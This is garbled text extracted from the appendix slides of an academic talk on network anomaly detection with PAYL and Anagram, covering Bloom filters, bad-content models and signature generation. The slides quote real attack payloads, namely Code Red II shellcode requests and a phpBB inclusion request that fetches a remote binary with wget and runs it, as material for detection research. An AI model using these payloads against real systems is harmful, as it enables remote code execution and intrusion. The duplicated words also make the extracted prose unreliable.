Main idea: Main idea: Store byte distributions of M packets Store byte distributions of M packets Optimize aggregate clustering of the M packetsOptimize aggregate clustering of the M packets Merge the resulting centroids into the existing Merge the resulting centroids into the existing
centroids from prior batch of datacentroids from prior batch of data Can ameliorate the problem of packet orderingCan ameliorate the problem of packet ordering The batch size M needs to be chosen properly: The batch size M needs to be chosen properly:
tradeoff of accuracy and memory consumptiontradeoff of accuracy and memory consumption
67
One-pass clustering result. First six centroids for W dataset, length 1460
68
Semi-batch clustering result. First six centroids for W dataset, length 1460
Return to main slides
69
PerformancePerformance Training over 3 days of data, detection Training over 3 days of data, detection
over 2 daysover 2 days Data from two web serversData from two web servers Training: 29 seconds (60 MBits/sec)Training: 29 seconds (60 MBits/sec) Detection: 12 seconds (54 MBits/sec)Detection: 12 seconds (54 MBits/sec) FP Rate: 42 / 625595 packets (0.006%)FP Rate: 42 / 625595 packets (0.006%) Coverage: 20/30 known attacks in data Coverage: 20/30 known attacks in data
detecteddetected
70
Bloom filterBloom filter A A Bloom filterBloom filter (BF) is a one-way data structure (BF) is a one-way data structure
that supports that supports insertinsert and and verifyverify operations, yet is operations, yet is fast and space-efficientfast and space-efficient
Represented as a bit vector; bit Represented as a bit vector; bit bb is set if is set if hhii((ee) = ) = bb, where , where hhii is a hash function and is a hash function and ee is the element is the element in questionin question
No false negatives, although false positives are No false negatives, although false positives are possible in a saturated BF via hash collisions; use possible in a saturated BF via hash collisions; use multiple hash functions for robustnessmultiple hash functions for robustness
Each n-gram is a candidate element to be inserted Each n-gram is a candidate element to be inserted or verified in the BFor verified in the BF
Bloom filters are also Bloom filters are also privacy-preservingprivacy-preserving, since n-, since n-grams cannot be extracted from the resulting bit grams cannot be extracted from the resulting bit vectorvector
71Return to main
72
Anagram: Anagram: semi-supervised learningsemi-supervised learning
Binary-based approach is simple and efficient, Binary-based approach is simple and efficient, but too sensitive to noisy databut too sensitive to noisy data
Pre-compute a Pre-compute a bad content modelbad content model using snort using snort rules and collection of worm samples, to rules and collection of worm samples, to supervise the learningsupervise the learning This model should match very few normal packets, This model should match very few normal packets,
while able to identify malicious traffic (often, new while able to identify malicious traffic (often, new exploits reuse portions of old exploits)exploits reuse portions of old exploits)
The model contains the distinct n-grams The model contains the distinct n-grams appearing in these malcode collectionsappearing in these malcode collections
Use a small, clean dataset to exclude the Use a small, clean dataset to exclude the normal n-grams appearing in the snort rules normal n-grams appearing in the snort rules and virus.and virus.
73
Bad content model (purple part)
N-grams in snort rules and collected malwares
N-grams in clean traffic
74
0 20 40 60 80 1000
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
Bad Content Model Matching Score
Per
cent
age
of th
e pa
cket
s
Normal Content Packets
0 20 40 60 80 1000
0.05
0.1
0.15
0.2
0.25
Bad Content Model Matching Score
Per
cent
age
of th
e pa
cket
s
Attack Packets
Distribution of bad content matching scores for normal packets (left) and attack packets (right).
The “matching score” is the percentage of the n-grams of a packet that match the bad content model
75
Use of bad content modelUse of bad content model Training: ignore possible malicious n-gramsTraining: ignore possible malicious n-grams
Packets with a max number of N-grams matching Packets with a max number of N-grams matching the bad content model are ignoredthe bad content model are ignored
Packets with high matching score (>5%) ignored, Packets with high matching score (>5%) ignored, since new attacks might reuse old exploit code.since new attacks might reuse old exploit code.
Ignoring few packets is harmless for trainingIgnoring few packets is harmless for training Testing: scoring separates malicious from Testing: scoring separates malicious from
normalnormal If a never-seen n-gram also appears in the bad If a never-seen n-gram also appears in the bad
content model, give a higher weight factor content model, give a higher weight factor tt for it. for it. (t=5 in our experiment)(t=5 in our experiment)
TNtN
Score badnewnew _*
Back
76
Feedback-based learning Feedback-based learning with shadow serverswith shadow servers
Training attacks: attacker sends malicious data Training attacks: attacker sends malicious data during training time to poison the model.during training time to poison the model. Bad content model cannot guarantee 100% detectionBad content model cannot guarantee 100% detection
The most reliable way is using the feedback of some The most reliable way is using the feedback of some host-based shadow server to supervise the traininghost-based shadow server to supervise the training
Also useful for adaptive learning to accommodate Also useful for adaptive learning to accommodate concept shiftingconcept shifting
PAYL/Anagram can be used as a first-line classifier PAYL/Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow serverto amortize the expensive cost of the shadow server Only small percentage of the all traffic is sent to shadow Only small percentage of the all traffic is sent to shadow
server, instead of allserver, instead of all The feedback of shadow server can be improve the The feedback of shadow server can be improve the
accuracy of Anagramaccuracy of Anagram
77Back
78
The structure of the The structure of the mimicry wormmimicry worm
79
The maximum possible padding The maximum possible padding length for a packet of different length for a packet of different varieties of this mimicry attackvarieties of this mimicry attack
versioversionn
418, 418, 1010
418, 418, 100100
730, 730, 1010
730, 730, 1010
730, 730, 100100
730, 730, 100100
PaddiPadding ng lengthlength
125125 149149 437437 461461 11671167 11911191
Each cell in the top row contains a tuple (x, y), representing a variant sequence of y packets of x bytes each.
The second row represents the maximum number of bytes that can be used for padding in each packet.Return to main
80
Ingress/egress Ingress/egress experimental settingexperimental setting
Launched CodeRed and CodeRed II in our Launched CodeRed and CodeRed II in our controlled test environment, capture the controlled test environment, capture the traces, and merge the traces into a real web traces, and merge the traces into a real web server's trace server's trace Simulate a real worm attacking and propagating Simulate a real worm attacking and propagating
on a real serveron a real server Interesting behavior observed about the Interesting behavior observed about the
wormworm Propagation occurred with packets fragmented Propagation occurred with packets fragmented
differently than the initial attack packets differently than the initial attack packets Multiple types of fragmentationMultiple types of fragmentation
81
1460, 1460, 8981448, 1448, 922
OutgoingIncoming
Code Red II (total 3818 bytes)
4, 13, 453, 1460, 1460, 649
4, 375, 1460, 1460, 740
4, 13, 362, 91, 1460, 1460, 6491448, 1448, 1143
OutgoingIncoming
Code Red (total 4039 bytes)
Different Different fragmentation for CR fragmentation for CR
and CRIIand CRII
82
MetricMetric Detect Detect propagatipropagationon
False False alertsalerts
SESE NoNo NoNoLCS(0.5)LCS(0.5) Yes Yes NoNoLCSeq(0.LCSeq(0.5)5)
YesYes NoNo
Results of correlation Results of correlation for different metricsfor different metrics
The number in the parenthesis is the The number in the parenthesis is the threshold setting for similarity score to threshold setting for similarity score to decide whether a propagation has occurreddecide whether a propagation has occurred
Return to main
83
Data DiversityData Diversity
Example byte distribution for payload length 536 of port 80 for the three sites.
84
EX, WEX, W1448, 1448, 0.78960.7896
1460, 1460, 0.78510.7851
216, 216, 0.62410.6241
EX, W1EX, W11460, 1460, 0.97460.9746
1448, 1448, 0.87310.8731
536, 536, 0.55400.5540
W, WW, W892, 892, 0.75020.7502
1460, 1460, 0.74560.7456
1448, 1448, 0.71220.7122
PAYL: for each pair of sites, the 3 packet lengths with the largest Manhattan distance between their byte distribution.
Dataset A
Dataset B
Common 5-grams
Common Perc(%)
EX (509347)
W (953345) 129468 17.5%
EX (509347)
W1 (974292) 99366 13.4%
W1 (974292)
W (953345) 454586 47.2%
Anagram: the number of unique 5-grams in dataset W, W1 and EX, and the common 5-grams numbers between each pair of sites.
Back
85
Testing methodologyTesting methodology Three sets of trafficThree sets of traffic
www1www1 and and www2www2: Columbia webservers, 100 : Columbia webservers, 100 packets eachpackets each
Malicious packet dataset, 56 packets eachMalicious packet dataset, 56 packets each Known Ground TruthKnown Ground Truth
Arranged into three sets of pairsArranged into three sets of pairs 10,000 “good vs. good”10,000 “good vs. good” 1,540 “bad vs. bad”1,540 “bad vs. bad” 5,600 “good vs. bad” between 5,600 “good vs. bad” between www1www1 and the and the
malicious datasetmalicious dataset CompareCompare
SimilaritySimilarity of the approaches of the approaches EffectivenessEffectiveness in correlating in correlating Ability to generate Ability to generate signaturessignatures
86
Similarity – direct string Similarity – direct string comparisoncomparison
0 10 20 30 40 50 60 70 800
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
Sim
ilarit
y S
core
Raw LCS
Zstr LCS
Raw LCSeq
Raw ED
Manhattan Distance
Zstr LCSeq
Zstr ED
High-level view of High-level view of score similaritiesscore similarities
Most of the Most of the techniques are techniques are similar, similar, exceptexcept LCS LCS (vulnerable to slight (vulnerable to slight differences)differences)
ED and LCSeq very ED and LCSeq very similarsimilar
N-gram techniques N-gram techniques not included not included (doesn’t compute (doesn’t compute similarity over entire similarity over entire packet datagram)packet datagram)Similarity score, 80 random
pairs of “good vs. good”Detail Comparison Bac
k
87
Similarity comparison Similarity comparison (II)(II)
To compare the difference more precisely, To compare the difference more precisely, normalizenormalize and compare scores and compare scores Compute similarity score vectors Compute similarity score vectors VVA A ,, V VBB
Match their mediansMatch their medians Scale ranges proportionally so min and max Scale ranges proportionally so min and max
values matchvalues match Manhattan distanceManhattan distance then computed between then computed between
the vectorsthe vectors Each privacy-enabled technique compared Each privacy-enabled technique compared
against Raw-LCSeq (baseline)against Raw-LCSeq (baseline)
88
Similarity of packets (III)Similarity of packets (III)TypeType Raw-Raw-
LCSLCSRaw-Raw-
EDEDMDMD ZStr-ZStr-
LCSLCSZStr-ZStr-LCSeLCSe
ZStr-ZStr-EDED
G-DG-D .094.09488
.033.03366
.066.06699
.207.20799
.079.07944
.066.06677
B-BB-B .050.05088
.044.04411
.065.06533
.039.03999
.026.02633
.066.06699
G-BG-B .025.02511
.024.02411
.011.01100
.031.03100
.019.01911
.023.02333
Unsurprisingly, Raw-ED closest to Raw-LCSeq Unsurprisingly, Raw-ED closest to Raw-LCSeq All privacy-preserving methods are closeAll privacy-preserving methods are close when when
correlating pairs including attack traffic; may be correlating pairs including attack traffic; may be leveraging difference between byte distributionsleveraging difference between byte distributions Manhattan distance between packet freq Manhattan distance between packet freq
distributions bestdistributions best
Normalized similarity scores (lower is better)
Back
89
Worm variants – CRII Worm variants – CRII exampleexample
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\x0d\n.
GET /notarealfile.idq?UOIRJVFJWPOIVNBUNIVUWIFOJIVNNZCIVIVIGJBMOMKRNVEWIFUVNVGFWERIOUNVUNWIUNFOWIFGITTOOWENVJSNVSFDVIRJGOGTNGTOWGTFGPGLKJFGOIRWTPOIREPTOEIGPOEWKFVVNKFVVSDNVFDSFNKVFKGTRPOPOGOPIRWOIRNNMSKVFPOSVODIOREOITIGTNJGTBNVNFDFKLVSPOERFROGDFGKDFGGOTDNKPRJNJIDH%u1234DSPPOITEBFBWEJFBHREWJFHFRG=bla HTTP/1.0\x0d\n.
[Crandall05]
90
Anagram privacy preserving Anagram privacy preserving cross-sites collaborationcross-sites collaboration
The anomalous n-grams of suspicious The anomalous n-grams of suspicious payload are stored in a Bloom filter, and payload are stored in a Bloom filter, and exchanged among sitesexchanged among sites
By checking the n-grams of local alerts By checking the n-grams of local alerts against the Bloom filter alert, it’s easy to against the Bloom filter alert, it’s easy to tell how similar the alerts are to each tell how similar the alerts are to each otherother The common malicious n-grams can be used The common malicious n-grams can be used
for general signature generation, even for for general signature generation, even for polymorphic wormspolymorphic worms
Privacy preserving with no loss of Privacy preserving with no loss of accuracyaccuracy
91
Robust Signature Robust Signature GenerationGeneration
Anagram not only detects suspicious Anagram not only detects suspicious packets, it also identifies the packets, it also identifies the corresponding malicious n-grams!corresponding malicious n-grams!
These n-grams are good targets for These n-grams are good targets for further analysis and signature further analysis and signature generationgeneration
The set of n-grams is order-The set of n-grams is order-independent. Attack vector reordering independent. Attack vector reordering will fail.will fail.
92
Anagram flattened signature Anagram flattened signature for attackfor attack
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..
N=3: *?ph*bb_*//8*p;wg*n;c*n;./c*n;ec*0YYY;echo|H*26.U*1;).*N=5: *ums/ad*in/admin_sty*.phpadmin_sty*hp?phpbb_root_path=http://81.174.26.111/cmd*cmd=cd%20/tmp;wget%20216*09.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTT*6.26.Use*5.1;)..*N=7: *dules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gi*?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/*59.16.26.User-*T 5.1;)..*
php attack content:
Generated signatures using different N:
Note: “.” for nonprintable characters; “*” represents a wildcard for signature matching